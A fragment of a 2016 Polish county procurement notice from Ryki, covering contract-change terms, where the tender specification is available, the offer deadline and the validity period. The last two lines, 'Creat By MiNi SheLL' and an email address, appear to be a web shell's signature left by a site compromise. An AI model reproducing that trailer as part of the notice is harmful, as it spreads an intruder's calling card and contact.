<p>Zamawiający przewiduje zmianę umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy w przypadku zmiany przepisów podatkowych, a w  szczególności dopuszcza się zmianę wynagrodzenia Wykonawcy  w przypadku wprowadzenia w okresie obowiązywania umowy podatku VAT  na usługi objęte  zamówieniem. Wynagrodzenie Wykonawcy ulegnie wówczas zmianie stosownie do zmiany stawki VAT i zostanie ubruttowione</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spryki.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Rykach przy ul. Wyczółkowskiego 10A, 08-500 Ryki, pokój 214 (II piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2016 godzina 12:00, miejsce: Starostwo Powiatowe w Rykach przy ul. Wyczółkowskiego 10A, 08-500 Ryki, pokój 103 (sekretariat - I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com